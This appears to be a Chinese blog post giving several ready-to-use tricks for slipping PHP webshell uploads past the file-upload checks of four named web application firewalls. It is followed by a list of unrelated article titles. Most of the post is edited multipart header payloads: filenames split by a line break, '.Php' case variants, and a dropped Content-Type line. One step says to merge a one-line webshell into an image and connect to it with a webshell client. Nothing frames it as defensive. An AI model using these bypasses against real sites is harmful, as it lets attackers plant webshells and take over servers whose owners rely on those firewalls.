上传绕过WAF几种常见的姿势
1:WTS-WAF 绕过上传
原内容:
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
添加回车
Content-Disposition: form-data; name="up_picture"; filename="xss.ph
p"
2:百度云上传绕过见下:
百度云绕过就简单的很多很多,在对文件名大小写上面没有检测php是过了的,Php就能过,或者PHP,一句话自己合成图片马用Xise连接即可。
Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
3:阿里云上传绕过见下:
源代码:
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下:
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
没错,将=号这里回车删除掉Content-Type: image/jpeg即可绕过。
4:安全狗上传绕过见下:
源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php".
最新文章
- SpringMVC+Spring+MyBatis+Maven调整【转】
- 关于在用curl函数post网页数据时,遇上表单提交 type为submit 类型而且没有name和id时可能遇到的问题及其解决方法
- PHP 类中的魔术方法
- Mysql zip格式安装
- 启动tomcat时遇到的问题
- JAVA_Collection容器
- 字符串模拟赛T2
- const 关键字及作用
- HTML4 和 HTML5 的10个关键区别
- 查看Linux系统版本信息
- touch事件学习
- 《算法导论》习题解答 Chapter 22.1-7(关联矩阵的性质)
- KKCapture 高清录像软
- table-cell完成左侧定宽,右侧定宽及左右定宽等布局
- LR12集合点设置和多个负载生成器策略
- 2016vijos 1-1 兔子的字符串(后缀数组 + 二分 + 哈希)
- BZOJ5371[Pkusc2018]星际穿越——可持久化线段树+DP
- 在Unity场景中控制日夜的轮转
- TObject、TPersisent 、TComponent、TControl、TGraphicControl、TWinControl 关系图
- .Net应该学什么怎么学(二)